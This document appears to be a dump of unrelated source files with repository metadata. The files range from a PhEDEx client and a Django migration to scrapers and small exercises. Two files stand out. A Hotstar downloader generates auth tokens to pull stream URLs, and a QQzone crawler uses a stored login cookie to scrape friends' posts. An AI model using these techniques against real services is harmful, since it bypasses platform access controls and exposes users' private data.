values = {'node':node, 'data':data, 'level':level, 'priority':priority, 'move':move, 'static':static, 'custodial':custodial, 'group':group, 'time_start':time_start, 'request_only':request_only, 'no_mail':no_mail, 'comments':comments}
url = "%s/json/%s/subscribe" % (self.phedexBase, instance)
try:
jsonData = self.call(url, values)
except Exception:
self.error("ERROR -- subscribe call failed", "values: node=%s, data=%s, level=%s, priority=%s, move=%s, static=%s, custodial=%s, group=%s, time_start=%s, request_only=%s, no_mail=%s, comments=%s, instance=%s\n" % (node, data, level, priority, move, static, custodial, group, time_start, request_only, no_mail, comments, instance))
return jsonData
def subscriptions(self, dataset='', block='', node='', se='', create_since='', request='', custodial='', group='', priority='', move='', suspended='', collapse='', percent_min='', percent_max='', instance='prod'):
values = {'dataset':dataset, 'block':block, 'node':node, 'se':se, 'create_since':create_since, 'request':request, 'custodial':custodial, 'group':group, 'priority':priority, 'move':move, 'suspended':suspended, 'collapse':collapse, 'percent_min':percent_min, 'percent_max':percent_max}
url = "%s/json/%s/subscriptions" % (self.phedexBase, instance)
try:
jsonData = self.call(url, values)
except Exception:
self.error("ERROR -- subscriptions call failed", "values: dataset=%s, block=%s, node=%s, se=%s, create_since=%s, request=%s, custodial=%s, group=%s, priority=%s, move=%s, suspended=%s, collapse=%s, percent_min=%s, percent_max=%s, instance=%s\n" % (dataset, block, node, se, create_since, request, custodial, group, priority, move, suspended, collapse, percent_min, percent_max, instance))
return jsonData
def transferRequests(self, request='', node='', group='', create_since='', limit='', approval='', requested_by='', instance='prod'):
values = {'request':request, 'node':node, 'group':group, 'create_since':create_since, 'limit':limit, 'approval':approval, 'requested_by':requested_by}
url = "%s/json/%s/transferrequests" % (self.phedexBase, instance)
try:
jsonData = self.call(url, values)
except Exception:
self.error("ERROR -- transferRequests call failed", "values: request=%s, node=%s, group=%s, create_since=%s, limit=%s, approval=%s, requested_by=%s, instance=%s\n" % (request, node, group, create_since, limit, approval, requested_by, instance))
return jsonData
def updateRequest(self, decision='', request='', node='', comments='', instance='prod'):
values = {'decision':decision, 'request':request, 'node':node, 'comments':comments}
url = "%s/json/%s/updaterequests" % (self.phedexBase, instance)
try:
jsonData = self.call(url, values)
except Exception:
self.error("ERROR -- updateRequest call failed", "values: decision=%s, request=%s, node=%s, comments=%s, instance=%s\n" % (decision, request, node, comments, instance))
return jsonData
#===================================================================================================
# H E L P E R C L A S S
#===================================================================================================
class HTTPSGridAuthHandler(urllib2.HTTPSHandler):
def __init__(self):
urllib2.HTTPSHandler.__init__(self)
self.key = self.getProxy()
self.cert = self.key
def https_open(self, req):
return self.do_open(self.getConnection, req)
def getProxy(self):
proxy = os.environ.get('X509_USER_PROXY')
if not proxy:
proxy = "/tmp/x509up_u%d" % (os.geteuid(),)
return proxy
def getConnection(self, host, timeout=300):
return httplib.HTTPSConnection(host, key_file=self.key, cert_file=self.cert)
| [
"barrefors@gmail.com"
] | barrefors@gmail.com |
8df22946d8253c3054208e5f4da0156f41eb2a38 | 19e9e3d063dc93206b4cc60bda006bb0da97d37c | /cmi/nwd_dzielenie.py | 15b5bd712fd707f26941c47016d72c877c932476 | [] | no_license | jasonj2333/python8 | 9825e565a805cd8edf1446bd08a21b1c43eab6a2 | abe1f7b6641b08ce430c86874b182cf1911baf5d | refs/heads/master | 2022-01-30T09:26:27.805311 | 2022-01-25T20:53:40 | 2022-01-25T20:53:40 | 225,360,380 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 215 | py | #zadanie 8 - parzyste
a = int(input("Podaj 1 liczbę: "))
b = int(input("Podaj 2 liczbę: "))
c=a
d=b
while(b != 0):
dzielnik = b
b = a%b
a = dzielnik
print("NWD dla liczb %d i %d wynosi %d"%(c, d, a))
| [
"jasonj2333@gmail.com"
] | jasonj2333@gmail.com |
dea277b6068f695ff986b4f15598ba361d0f8ffb | 668dc0eb4e76c3cb1e568c4568fec80e493c8379 | /imageClassifier/uploadImages/migrations/0002_auto_20180328_1839.py | 8c12973445ce6906c3039627f20d6f1da8653b65 | [] | no_license | 6Jonathan6/imageClassifier | e9680e4e8d7d8972bef9da4c558d36343ab2e648 | af870d6ad496274374d4a163e626c297391b68ec | refs/heads/master | 2020-03-08T13:06:33.012179 | 2018-04-05T02:42:51 | 2018-04-05T02:42:51 | 128,149,146 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 432 | py | # Generated by Django 2.0.2 on 2018-03-28 18:39
import django.contrib.postgres.fields.jsonb
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('uploadImages', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='image',
name='labels',
field=django.contrib.postgres.fields.jsonb.JSONField(),
),
]
| [
"ec2-user@ip-172-31-56-157.ec2.internal"
] | ec2-user@ip-172-31-56-157.ec2.internal |
b3a25a16c44a7880c5d114a9d24cd90fce6c7cab | 229662997dbef8f1694cec4e365704f91435895a | /app.py | 9038671409e93fbb85c41c1aa47fbaccb8f8e5ec | [] | no_license | artwrk-samyak/dynamo | 4185c83bacef01dbef82d606f2c6c98d769d3b0b | fff802655e3c5867630e35b09426c5448835b557 | refs/heads/master | 2022-10-13T21:17:30.513614 | 2020-06-14T14:38:43 | 2020-06-14T14:38:43 | 272,220,334 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 502 | py | import boto3
def get_details(table):
client = boto3.client('dynamodb') #connection
response = str(client.describe_table(TableName=table))
print(response)
def put_value(table):
dynamodb = boto3.resource('dynamodb') #connection
response = dynamodb.Table(table).put_item(
Item={
'Artist_Id': 25,
'ArtwrkTitle': "Painting",
}
)
print(response)
get_details("Test_Profile")
#put_value("Test_Profile")
| [
"noreply@github.com"
] | artwrk-samyak.noreply@github.com |
10cb9577b9bb3df887a10d040a16bb298fd3def5 | 5918f9231b8e7403907b19f863bb4fa59f468cf6 | /hotstar_dl.py | ecd153b252cf3484fabf0aab6697f4a3277455f2 | [] | no_license | venkatasudheers1234/hotstar-dl | f1918f203f954ed84c3147a96c10d5bb3a5f3200 | f83e5060d3e53e3769257d68eafa11d0cb043636 | refs/heads/main | 2023-04-08T02:22:44.783651 | 2021-04-23T13:02:01 | 2021-04-23T13:02:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,857 | py | import requests
import uuid
import os
import re
import pyfiglet
from utils.helper import generate_hmac_id, generate_user_token, ffmpeg_download
def video_extractor(url):
id = url.split("/")[6]
auth = generate_hmac_id()
user_token = generate_user_token()
response = requests.get(
"https://api.hotstar.com/play/v2/playback/content/" + id,
headers={
"hotstarauth": auth,
"x-hs-appversion": "7.15.1",
"x-hs-platform": "web",
"x-hs-usertoken": user_token,
"user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36",
},
params={
"desired-config": "audio_channel:stereo|dynamic_range:sdr|encryption:plain|ladder:tv|package:dash|resolution:hd|subs-tag:HotstarVIP|video_codec:vp9",
"device-id": str(uuid.uuid4()),
"os-name": "Windows",
"os-version": "10",
},
)
data = response.json()
if data["message"] != "Playback URL's fetched successfully":
print("DRM Protected..! || Premium pack Required")
return
return data
def main():
ascii_art = pyfiglet.figlet_format("Hotstar dl")
print(ascii_art)
url = str(input("Enter the Hotstar URL: "))
url_regex = r'https?://(?:www\.)?hotstar\.com/(?:.+[/-])?(?P<id>\d{10})'
valid_url = re.match(url_regex, url)
if valid_url:
video_data = video_extractor(url)
playBackSets = video_data["data"]["playBackSets"]
for playBackSet in playBackSets:
if playBackSet["tagsCombination"] == "encryption:plain;package:hls":
hls_url = playBackSet["playbackUrl"]
ffmpeg_download(hls_url, url)
if __name__ == '__main__':
main()
| [
"prajwalan364@gmail.com"
] | prajwalan364@gmail.com |
e4218be06a9223b9313b577ae2ccd2082b6b7271 | 1092fbf62419d7bf9326efebe0aace3f855cf177 | /python/pyspark/pandas/missing/frame.py | d822c1419247ace140836d9e1f0de5390d87a7bc | [
"Apache-2.0",
"CC0-1.0",
"GCC-exception-3.1",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"CC-BY-SA-3.0",
"LicenseRef-scancode-free-unknown",
"LGPL-2.0-or-later",
"CPL-1.0",
"NAIST-2003",
"LicenseRef-scancode-unicode",
"CC-PDDC",
"LicenseRef-scancode-other-copyleft",
"EPL-1.0",
"LicenseRef-scancode-unknown-license-reference",
"Classpath-exception-2.0",
"LGPL-2.1-only",
"LicenseRef-scancode-other-permissive",
"CDDL-1.0",
"MIT",
"GPL-2.0-only",
"LicenseRef-scancode-public-domain",
"Python-2.0",
"CDDL-1.1",
"EPL-2.0",
"BSD-2-Clause"
] | permissive | bettermouse/spark | 6cd00c76b42699aca5b0450a081ea4c5a718ba40 | cf19cf5c83f22fb3d6249e1168bd90aad400fde1 | refs/heads/master | 2021-12-14T03:20:49.654960 | 2021-12-08T11:28:30 | 2021-12-08T11:28:30 | 234,536,105 | 0 | 0 | Apache-2.0 | 2020-01-17T11:36:32 | 2020-01-17T11:36:31 | null | UTF-8 | Python | false | false | 3,102 | py | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from pyspark.pandas.missing import unsupported_function, unsupported_property, common
def _unsupported_function(method_name, deprecated=False, reason=""):
return unsupported_function(
class_name="pd.DataFrame", method_name=method_name, deprecated=deprecated, reason=reason
)
def _unsupported_property(property_name, deprecated=False, reason=""):
return unsupported_property(
class_name="pd.DataFrame", property_name=property_name, deprecated=deprecated, reason=reason
)
class _MissingPandasLikeDataFrame(object):
# Functions
asfreq = _unsupported_function("asfreq")
asof = _unsupported_function("asof")
boxplot = _unsupported_function("boxplot")
combine = _unsupported_function("combine")
compare = _unsupported_function("compare")
convert_dtypes = _unsupported_function("convert_dtypes")
corrwith = _unsupported_function("corrwith")
ewm = _unsupported_function("ewm")
infer_objects = _unsupported_function("infer_objects")
interpolate = _unsupported_function("interpolate")
mode = _unsupported_function("mode")
reorder_levels = _unsupported_function("reorder_levels")
resample = _unsupported_function("resample")
set_axis = _unsupported_function("set_axis")
to_feather = _unsupported_function("to_feather")
to_gbq = _unsupported_function("to_gbq")
to_hdf = _unsupported_function("to_hdf")
to_period = _unsupported_function("to_period")
to_sql = _unsupported_function("to_sql")
to_stata = _unsupported_function("to_stata")
to_timestamp = _unsupported_function("to_timestamp")
tz_convert = _unsupported_function("tz_convert")
tz_localize = _unsupported_function("tz_localize")
# Deprecated functions
tshift = _unsupported_function("tshift", deprecated=True, reason="Please use shift instead.")
slice_shift = _unsupported_function(
"slice_shift", deprecated=True, reason="You can use DataFrame/Series.shift instead."
)
lookup = _unsupported_function(
"lookup", deprecated=True, reason="Use DataFrame.melt and DataFrame.loc instead."
)
# Functions we won't support.
to_pickle = common.to_pickle(_unsupported_function)
memory_usage = common.memory_usage(_unsupported_function)
to_xarray = common.to_xarray(_unsupported_function)
| [
"gurwls223@apache.org"
] | gurwls223@apache.org |
69c92ee8ed5eb078b614684a346b089f78b4a750 | eec8ce578fb66dbddc44bbaf6844044be8833397 | /venv/bin/easy_install-3.6 | a6825d0cabe19cbd90459818aafb27dd7c96d8bb | [] | no_license | tuanweb92my/store_rest_api_test | 0f5b43675b05b538ffac99e4ada4d54a9a9930a2 | 47c862dfd35a4f532a890a1f2a050b2ad6cb2831 | refs/heads/master | 2020-04-24T02:27:16.473994 | 2019-02-20T09:55:46 | 2019-02-20T09:55:46 | 171,637,064 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 290 | 6 | #!/Users/nguyeant/Downloads/testing-python-apps/section8/venv/bin/python3.6
# -*- coding: utf-8 -*-
import re
import sys
from setuptools.command.easy_install import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"nguyenanhtuan92my@gmail.com"
] | nguyenanhtuan92my@gmail.com |
8eae7291444ef47cce77a8103e2172bc6bd9bad6 | 53faa0ef3496997412eb5e697bc85eb09a28f8c9 | /math/0x01-plotting/1-scatter.py | a31bb2257ce08f336c4b29620aefcb8612f794db | [] | no_license | oran2527/holbertonschool-machine_learning | aaec2ffe762b959573f98a5f4e002272a5d643a3 | 8761eb876046ad3c0c3f85d98dbdca4007d93cd1 | refs/heads/master | 2023-08-14T00:37:31.163130 | 2021-09-20T13:34:33 | 2021-09-20T13:34:33 | 330,999,053 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 332 | py | #!/usr/bin/env python3
import numpy as np
import matplotlib.pyplot as plt
mean = [69, 0]
cov = [[15, 8], [8, 15]]
np.random.seed(5)
x, y = np.random.multivariate_normal(mean, cov, 2000).T
y += 180
plt.xlabel('Height (in)')
plt.ylabel('Weight (lbs)')
plt.title('Men\'s Height vs Weight')
plt.plot(x, y, 'ro', color="m")
plt.show()
| [
"orlago250183@gmail.com"
] | orlago250183@gmail.com |
284e0490864499f54aad2f20350204ec7c8c027c | b5550fc728b23cb5890fd58ccc5e1668548dc4e3 | /virt/xenapi/client/objects.py | e802cad3a40334862761921e10431b1be1d92fa6 | [] | no_license | bopopescu/nova-24 | 0de13f078cf7a2b845cf01e613aaca2d3ae6104c | 3247a7199932abf9718fb3260db23e9e40013731 | refs/heads/master | 2022-11-20T00:48:53.224075 | 2016-12-22T09:09:57 | 2016-12-22T09:09:57 | 282,140,423 | 0 | 0 | null | 2020-07-24T06:24:14 | 2020-07-24T06:24:13 | null | UTF-8 | Python | false | false | 4,602 | py | #coding:utf-8
# Copyright 2013 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from nova import utils
class XenAPISessionObject(object):
"""Wrapper to make calling and mocking the session easier
The XenAPI protocol is an XML RPC API that is based around the
XenAPI database, and operations you can do on each of the objects
stored in the database, such as VM, SR, VDI, etc.
For more details see the XenAPI docs:
http://docs.vmd.citrix.com/XenServer/6.2.0/1.0/en_gb/api/
Most, objects like VM, SR, VDI, etc, share a common set of methods:
* vm_ref = session.VM.create(vm_rec)
* vm_ref = session.VM.get_by_uuid(uuid)
* session.VM.destroy(vm_ref)
* vm_refs = session.VM.get_all()
Each object also has specific messages, or functions, such as:
* session.VM.clean_reboot(vm_ref)
Each object has fields, like "VBDs" that can be fetched like this:
* vbd_refs = session.VM.get_VBDs(vm_ref)
You can get all the fields by fetching the full record.
However please note this is much more expensive than just
fetching the field you require:
* vm_rec = session.VM.get_record(vm_ref)
When searching for particular objects, you may be tempted
to use get_all(), but this often leads to races as objects
get deleted under your feet. It is preferable to use the undocumented:
* vms = session.VM.get_all_records_where(
'field "is_control_domain"="true"')
"""
def __init__(self, session, name):
self.session = session
self.name = name
def _call_method(self, method_name, *args):
call = "%s.%s" % (self.name, method_name)
return self.session.call_xenapi(call, *args)
def __getattr__(self, method_name):
return lambda *params: self._call_method(method_name, *params)
class VM(XenAPISessionObject):
"""Virtual Machine."""
def __init__(self, session):
super(VM, self).__init__(session, "VM")
class VBD(XenAPISessionObject):
"""Virtual block device."""
def __init__(self, session):
super(VBD, self).__init__(session, "VBD")
def plug(self, vbd_ref, vm_ref):
@utils.synchronized('xenapi-vbd-' + vm_ref)
def synchronized_plug():
self._call_method("plug", vbd_ref)
# NOTE(johngarbutt) we need to ensure there is only ever one
# VBD.unplug or VBD.plug happening at once per VM
# due to a bug in XenServer 6.1 and 6.2
synchronized_plug()
def unplug(self, vbd_ref, vm_ref):
@utils.synchronized('xenapi-vbd-' + vm_ref)
def synchronized_unplug():
self._call_method("unplug", vbd_ref)
# NOTE(johngarbutt) we need to ensure there is only ever one
# VBD.unplug or VBD.plug happening at once per VM
# due to a bug in XenServer 6.1 and 6.2
synchronized_unplug()
class VDI(XenAPISessionObject):
"""Virtual disk image."""
def __init__(self, session):
super(VDI, self).__init__(session, "VDI")
class SR(XenAPISessionObject):
"""Storage Repository."""
def __init__(self, session):
super(SR, self).__init__(session, "SR")
class PBD(XenAPISessionObject):
"""Physical block device."""
def __init__(self, session):
super(PBD, self).__init__(session, "PBD")
class PIF(XenAPISessionObject):
"""Physical Network Interface."""
def __init__(self, session):
super(PIF, self).__init__(session, "PIF")
class VLAN(XenAPISessionObject):
"""VLAN."""
def __init__(self, session):
super(VLAN, self).__init__(session, "VLAN")
class Host(XenAPISessionObject):
"""XenServer hosts."""
def __init__(self, session):
super(Host, self).__init__(session, "host")
class Network(XenAPISessionObject):
"""Networks that VIFs are attached to."""
def __init__(self, session):
super(Network, self).__init__(session, "network")
class Pool(XenAPISessionObject):
"""Pool of hosts."""
def __init__(self, session):
super(Pool, self).__init__(session, "pool")
| [
"719184289@qq.com"
] | 719184289@qq.com |
f61c551575b980d89d409934c89b3df93ae03fdc | 2fd9e55cf1d8c13bd475122482e13954d2a001e7 | /Web_Scraping_example.py | af6ed033cb2d3fc253ef772c722c295e3ad56ff9 | [] | no_license | amarosfg/A-Useful-Tool-to-Collect-Data-Web-Scraping | 2a2c68e96da4a4bb91b708c4e8b74d36c438a533 | 5f93730037cee973e6e2dc7704c94b196bdc2ddc | refs/heads/main | 2022-12-31T20:37:11.501444 | 2020-10-25T22:36:47 | 2020-10-25T22:36:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,584 | py | from selenium import webdriver
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
import pandas
import numpy
from openpyxl import Workbook
#The variable wb creates an excel workbook
wb = Workbook()
#Activate the active worksheet
ws = wb.active
#The variables options and preferences that the programmer wants enable or disable
caps = DesiredCapabilities().CHROME
caps["pageLoadStrategy"] = "normal"
chrome_options = webdriver.ChromeOptions()
chrome_options.add_argument(" - disable-infobars")
#The directory MUST be changed if the code is used in another computer
prefs={"download.default_directory" : "C:/Users/xxxxxx/Documents/Python Scripts/Driver/"}
chrome_options.add_experimental_option("prefs",prefs)
#The variables path and archive_excel have the routes to the WebDriver and the csv file with the list of ETFs
#Same as in line 15
path="C:/Users/xxxxxx/Documents/Python Scripts/Driver/chromedriver.exe"
archivo_excel='C:/Users/xxxxxx/Documents/Python Scripts/Web_Scrapping/Excel/Prueba.csv'
#df reads the file and assign into two variables, the size of the data that archivo_excel has
df=pandas.read_csv(archivo_excel, sep=',')
ren=df.shape[0]
col=df.shape[1]
#The variable nombres is a vector that has the names of all the ETFs the code is going to do web scraping
nombres=list(df.iloc[:,0])
#The variable drive has the path and all the preferences described in line 10
driver=webdriver.Chrome(path,chrome_options=chrome_options,desired_capabilities=caps)
x=ren
l=[]
y=[]
#The variable y has all the features that the code is going to extract from the web page
y=['ETF','Segmento','Score 1','Score 2','Net Asset Value (Yesterday)','Expense Ratio','Assets Under Management','Average Daily $ Volume', 'Holding_1', 'Holding_2', 'Holding_3', 'Holding_4', 'Holding_5', 'Holding_6', 'Holding_7', 'Holding_8', 'Holding_9', 'Holding_10']
#The variable y is inserted in the first row of the workbook that was created
ws.append(y)
#The code will repeat the next lines for each ETF stored in the variable nombres
for x in range(0,len(nombres)):
y=[]
#The variable etf will be the name of the ETF
etf=nombres[x]
#The WebDriver will open the requested web page with the specific ETF
driver.get("http://www.etf.com/"+etf)
#The WebDriver will search the text that the programmer wants to extract by searching the XPath
segmento_html=driver.find_element_by_xpath('//*[@id="form-reports-header"]/div[1]/section[3]/div[1]/div[1]/div/a')
#The variable segmento will store the text that the WebDriver found from the XPath
segmento=segmento_html.text
#The functions try and except are used in case the information the programmer wanted is not found
try:
score_1_html=driver.find_element_by_xpath('//*[@id="score"]/span/div[1]')
score_1=score_1_html.text
score_2_html =driver.find_element_by_xpath('//*[@id="score"]/span/div[2]')
score_2=score_2_html.text
except:
score_1="NA"
score_2="NA"
try:
NAV_html=driver.find_element_by_xpath('//*[@id="fundTradabilityData"]/div/div[16]/span')
NAV=NAV_html.text
except:
NAV="NA"
#The variable y will store all the features that were founded by the WebDriver
y.extend([etf,segmento,score_1,score_2,NAV])
#The features stored in summary_table had different structure inside the webpage for some ETFs. The rest of the
#Structure remains as in line 43 of the code
summary_table=[]
for p in range(4,7):
#pdb.set_trace()
try:
if etf=="QQQ" or etf=="GDX" or etf=="VWO" or etf=="GDXJ" or etf=="VEA" or etf=="RSX" or etf=="OIH" or
etf=="SMH" or etf=="VNQ" or etf=="VGK" or etf=="VOO":
summary_data_html =driver.find_element_by_xpath('//*[@id="fundSummaryData"]/div/div['+str(p)+']/span')
summary_data=summary_data_html.text
summary_table.extend([summary_data])
y.extend([summary_data])
elif etf=="TQQQ" or etf=="JNUG" or etf=="NUGT" or etf=="UPRO" or etf=="SPXL" or etf=="TNA" or etf=="ERX":
summary_data_html =driver.find_element_by_xpath(' //*[@id="fundSummaryData"]/div/div['+str(p-1)+']/span')
summary_data=summary_data_html.text
summary_table.extend([summary_data])
y.extend([summary_data])
else:
summary_data_html =driver.find_element_by_xpath('//*[@id="fundSummaryData"]/div/div['+str(p+1)+']/span')
summary_data=summary_data_html.text
summary_table.extend([summary_data])
y.extend([summary_data])
except:
summary_data="NA"
summary_table.extend([summary_data])
y.extend([summary_data])
#Same happens to variable holdings_table as in lines 64 and 65
holdings_table=[]
for p in range(1,11):
#pdb.set_trace(), is used to track possible errors in the for loop
try:
holdings_html =driver.find_element_by_xpath('//*[@id="fit"]/div[1]/div[2]/div/div['+str(p)+']')
holdings_data=holdings_html.text
holdings_table.extend([holdings_data])
y.extend([holdings_data])
except:
holdings_data="NA"
holdings_table.extend([holdings_data])
y.extend([holdings_data])
ws.append(y)
#Save the workbook in that route and with the name resultadoetf.csv. Same as in line 15
wb.save('C:/Users/xxxxxx/Documents/Python Scripts/Web_Scrapping/Excel/resultadoetf.csv')
#The WebDriver is closed
driver.quit()
| [
"noreply@github.com"
] | amarosfg.noreply@github.com |
2412eddc47f2013111e511fe282a4454d0b51120 | c45de1dc96e83028bf150f517d0fa6d7b12a166d | /notebooks/_context.py | 9da323ad3bf37498edcf5944dd0d4bbce76da054 | [] | no_license | EmilioTyl/transformers_from_scratch | 36dc58b30d94d873cb7d496545291bb4ca9697de | 3bb025281eeb877ef1a5844fa81df04c57aa13a1 | refs/heads/master | 2022-12-11T04:54:00.792888 | 2020-08-27T09:14:08 | 2020-08-27T09:14:08 | 286,479,715 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 203 | py | import os
import sys
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '../src')))
import src | [
"emilio.tylson@satellogic.com"
] | emilio.tylson@satellogic.com |
96c4752b789ae956d8b79a60a674b50ba638d7b1 | 9fdc676a6cabd9d47eb470659047b406a1305d02 | /flask_hougou.py | 6db82d600df199c54243326ce341288eb4a9fb0f | [
"MIT"
] | permissive | ColdFc/test | c3cb296095cca718db93b1ff6f918bc8b40067f7 | a0be1d71cee99351763205efb6224142ec208687 | refs/heads/master | 2020-05-26T20:48:35.014900 | 2019-05-24T12:54:52 | 2019-05-24T12:54:52 | 188,369,125 | 9 | 0 | null | null | null | null | UTF-8 | Python | false | false | 720 | py | from flask import Flask
from flask import request
app = Flask(__name__, static_url_path="", static_folder="static")
class Config(object):
DEBUG = True
app.config.from_object(Config)
@app.route("/", methods=["GET"])
def index():
with open("templates/home.html", "rb") as f:
content = f.read()
return content
@app.route("/login.html", methods=["GET", "POST"])
def login():
with open("templates/login.html", "rb") as f:
content = f.read()
return content
@app.route("/register.html", methods=["POST", "GET"])
def register():
with open("templates/register.html", "rb") as f:
content = f.read()
return content
if __name__ == '__main__':
app.run(debug=True)
| [
"666666@qq.com"
] | 666666@qq.com |
55e61a82cbbef2c7f69744f6e61aabfee698e0d1 | e1e87a1addef379797a131d2458b01fb98ed7ff5 | /bci/samples/python/gbm_benchmark_v2.py | 140c2233d61c1867ddf9103453ebaedb4244eee6 | [] | no_license | thekannman/kaggle | d564a52a4da163da52d8f4348f0438db0fda7fc1 | a8e0bf60ce643385b1e880fffb8db850c2cf32c8 | refs/heads/master | 2021-01-10T02:31:15.054100 | 2015-10-28T03:14:39 | 2015-10-28T03:14:39 | 45,085,807 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,728 | py | ## author: phalaris
## kaggle bci challenge gbm benchmark
from __future__ import division
import numpy as np
import pandas as pd
import sklearn.ensemble as ens
train_subs = ['02','06','07','11','12','13','14','16','17','18','20','21','22','23','24','26']
test_subs = ['01','03','04','05','08','09','10','15','19','25']
train_labels = pd.read_csv('TrainLabels.csv')
submission = pd.read_csv('SampleSubmission.csv')
train = pd.DataFrame(columns=['subject','session','feedback_num','start_pos'] + ['Cz_' + s for s in map(str,range(261))],index=range(5440))
counter = 0
print 'loading train data'
data = {}
for i in train_subs:
for j in range(1,6):
temp = pd.read_csv('train/Data_S' + i + '_Sess0' + str(j) + '.csv')
fb = temp.query('FeedBackEvent == 1',engine='python')['FeedBackEvent']
counter2 = 0
for k in fb.index:
temp2 = temp.loc[int(k):int(k)+260,'Cz']
temp2.index = ['Cz_' + s for s in map(str,range(261))]
train.loc[counter,['Cz_' + s for s in map(str,range(261))]] = temp2
train.loc[counter,'session'] = j
train.loc[counter, 'subject'] = i
train.loc[counter, 'feedback_num'] = counter2
train.loc[counter, 'start_pos'] = k
counter +=1
counter2 +=1
print 'subject ', i
train.to_csv('train_cz.csv',ignore_index=True)
test = pd.DataFrame(columns=['subject','session','feedback_num','start_pos'] + ['Cz_' + s for s in map(str,range(261))],index=range(3400))
print 'loading test data'
counter = 0
data = {}
for i in test_subs:
for j in range(1,6):
temp = pd.read_csv('test/Data_S' + i + '_Sess0' + str(j) + '.csv')
fb = temp.query('FeedBackEvent == 1',engine='python')['FeedBackEvent']
counter2 = 0
for k in fb.index:
temp2 = temp.loc[int(k):int(k)+260,'Cz']
temp2.index = ['Cz_' + s for s in map(str,range(261))]
test.loc[counter,['Cz_' + s for s in map(str,range(261))]] = temp2
test.loc[counter,'session'] = j
test.loc[counter, 'subject'] = i
test.loc[counter, 'feedback_num'] = counter2
test.loc[counter, 'start_pos'] = k
counter +=1
counter2 +=1
print 'subject ', i
test.to_csv('test_cz.csv',ignore_index=True)
print 'training GBM'
gbm = ens.GradientBoostingClassifier(n_estimators=500,learning_rate=0.05, max_features=0.25)
gbm.fit(train, train_labels.values[:,1].ravel())
preds = gbm.predict_proba(test)
preds = preds[:,1]
submission['Prediction'] = preds
submission.to_csv('gbm_benchmark.csv',index=False)
print 'Done'
| [
"zkann@wisc.edu"
] | zkann@wisc.edu |
cc58f72ba71f39f13c3376a8c2f163006cbb6680 | 645144dddae7921d562300656feaf330223bd2d9 | /QQzone_crawler/util.py | 43c61a161e504ea5fb62bd70b39b3537e5dc1d97 | [] | no_license | zhuliquan/crawler_learning | 79c4b13aea8e5f62cc7687473f14c778d72d6389 | b0e4944cee4e143c7d2497f6688c2c5b06ad979a | refs/heads/master | 2021-05-10T09:53:19.799091 | 2018-04-27T12:28:19 | 2018-04-27T12:28:19 | 118,942,678 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,838 | py | #!/usr/bin/env python3
#-*- coding:utf-8 -*-
from urllib import parse
import os
def get_cookie():
'''Get cookie from cookie_file'''
with open('cookie_file') as f:
cookie = f.read()
cookie = cookie.replace('\n', '')
return cookie
cookie = get_cookie()
headers = {'host': 'h5.qzone.qq.com',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'zh,zh-CN;q=0.8,en-US;q=0.5,en;q=0.3',
'Accept-Encoding': 'gzip, deflate, br',
'Cookie': cookie,
'connection': 'keep-alive'}
def get_g_tk():
''' make g_tk value'''
pskey_start = cookie.find('p_skey=')
pskey_end = cookie.find(';', pskey_start)
p_skey = cookie[pskey_start+7: pskey_end]
h = 5381
for s in p_skey:
h += (h << 5) + ord(s)
return h & 2147483647
g_tk = get_g_tk()
def parse_moods_url(qqnum):
'''This method use to get every friend's mood cgi url
So it needs the friend's qqnumber to get their url
'''
params = {"cgi_host": "http://taotao.qq.com/cgi-bin/emotion_cgi_msglist_v6",
"code_version": 1,
"format": "jsonp",
"g_tk": g_tk,
"hostUin": qqnum,
"inCharset": "utf-8",
"need_private_comment": 1,
"notice": 0,
"num": 20,
"outCharset": "utf-8",
"sort": 0,
"uin": qqnum}
host = "https://h5.qzone.qq.com/proxy/domain/taotao.qq.com/cgi-bin/emotion_cgi_msglist_v6?"
url = host + parse.urlencode(params)
return url
def parse_friends_url():
'''This method only generate the friends of the owner
So do not need to get qq number, just get it from
self cookie
'''
cookie = headers['Cookie']
qq_start = cookie.find('uin=o')
qq_end = cookie.find(';', qq_start)
qqnumber = cookie[qq_start+5 : qq_end]
if qqnumber[0] == 0:
qqnumber = qqnumber[1:]
params = {"uin": qqnumber,
"fupdate": 1,
"action": 1,
"g_tk": g_tk}
